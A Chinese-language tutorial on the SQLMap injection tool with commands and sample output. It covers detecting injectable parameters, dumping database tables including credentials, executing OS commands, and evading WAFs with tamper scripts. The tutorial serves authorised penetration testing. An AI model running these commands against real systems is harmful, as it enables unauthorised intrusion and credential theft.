SQLMap 全面解析:从入门到实战应用
一、SQLMap 是什么?
SQLMap 是一款开源的自动化 SQL 注入工具,由意大利安全专家 Bernardo Damele A. G. 开发。它通过检测和利用数据库漏洞,可获取目标数据库的敏感信息(如用户密码、数据表结构),甚至执行系统命令。SQLMap 支持多种数据库(MySQL、Oracle、PostgreSQL 等)和注入类型,是渗透测试和安全审计的核心工具之一。
二、SQLMap 能做什么?
漏洞检测
- 自动发现各种 SQL 注入点(GET/POST 参数、Cookies、HTTP 头信息等)。
- 支持布尔型盲注、时间盲注、报错注入等多种检测技术。
数据提取
- 获取数据库名称、表名、列名及数据内容。
- 提取用户认证信息(如哈希密码)、敏感业务数据。
权限提升
- 检测数据库用户权限,尝试提升至管理员权限。
- 利用数据库特性(如 MySQL 的 FILE 权限)读写文件。
系统命令执行
- 在数据库拥有足够权限时,执行操作系统命令(如反弹 Shell)。
指纹识别
- 识别目标数据库类型(如 MySQL、SQL Server)及其版本。
三、常见场景与命令示例(含响应结果)
1. 基础检测:URL 参数注入
命令:
sqlmap -u "http://example.com/vuln.php?id=1" --batch
# -u:目标 URL
# --batch:自动回答所有提示,非交互式模式
响应结果示例:
[*] GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 100 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1=1
---
2. 检测 POST 参数注入
命令:
sqlmap -u "http://example.com/login.php" --data="username=test&password=test" --batch
# --data:POST 请求数据
响应结果示例:
[*] POST parameter 'username' is vulnerable.
[*] POST parameter 'password' is vulnerable.
3. 检测 Cookie 注入
命令:
sqlmap -u "http://example.com/dashboard.php" --cookie="session=abc123" --batch
# --cookie:指定 Cookie 值
响应结果示例:
[*] Cookie parameter 'session' is vulnerable.
4. 枚举数据库和表
命令:
sqlmap -u "http://example.com/vuln.php?id=1" --dbs --batch
# --dbs:列出所有数据库
响应结果示例:
available databases [4]:
[*] information_schema
[*] mysql
[*] test
[*] users
命令:
sqlmap -u "http://example.com/vuln.php?id=1" -D users --tables --batch
# -D:指定数据库名
# --tables:列出指定数据库中的表
响应结果示例:
Database: users
[3 tables]
+-------------+
| accounts |
| customers |
| employees |
+-------------+
5. 导出表数据
命令:
sqlmap -u "http://example.com/vuln.php?id=1" -D users -T accounts --columns --batch
# -T:指定表名
# --columns:列出表中的列
响应结果示例:
Database: users
Table: accounts
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(11) |
| username | varchar(50) |
| password | varchar(50) |
| email | varchar(50) |
+----------+-------------+
命令:
sqlmap -u "http://example.com/vuln.php?id=1" -D users -T accounts -C username,password --dump --batch
# -C:指定列名
# --dump:导出数据
响应结果示例:
Database: users
Table: accounts
[2 entries]
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | $2y$10$XQdJ9tHhKqJdJ9tHhKqJdJ | # 哈希密码
| test | test123 |
+----------+----------------------------------+
6. 执行系统命令(需 DBA 权限)
命令:
sqlmap -u "http://example.com/vuln.php?id=1" --os-cmd="id" --batch
# --os-cmd:执行系统命令
响应结果示例:
[*] the back-end DBMS is MySQL
[*] testing if current user is DBA... yes
[*] command: id
[*] output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
7. 高级选项:指定注入类型和线程数
命令:
sqlmap -u "http://example.com/vuln.php?id=1" --technique=BEUST --threads=10 --batch
# --technique:指定注入技术(B=布尔盲注,E=报错注入,U=联合查询,S=栈查询,T=时间盲注)
# --threads:设置并发线程数
8. 绕过 WAF/防火墙
命令:
sqlmap -u "http://example.com/vuln.php?id=1" --tamper=space2comment,randomcase --batch
# --tamper:使用脚本绕过安全设备
四、注意事项
- 法律合规:仅在获得明确授权的环境中使用,避免对未授权系统进行测试。
- 数据安全:导出敏感数据需谨慎,避免数据泄露风险。
- 性能影响:大规模扫描可能导致目标服务器负载过高,建议控制线程数(
--threads)。 - 误报处理:部分 WAF 可能触发假阳性,需结合手动验证。
- 更新维护:定期更新 SQLMap 至最新版本(
git pull)以获取最新漏洞利用脚本。
SQLMap 的自动化能力使其成为 SQL 注入测试的首选工具,但需结合安全意识和专业知识合理使用。在实际渗透测试中,建议先进行信息收集(如使用 Nmap 扫描开放端口),再针对性地使用 SQLMap 进行漏洞验证,以提高测试效率和准确性。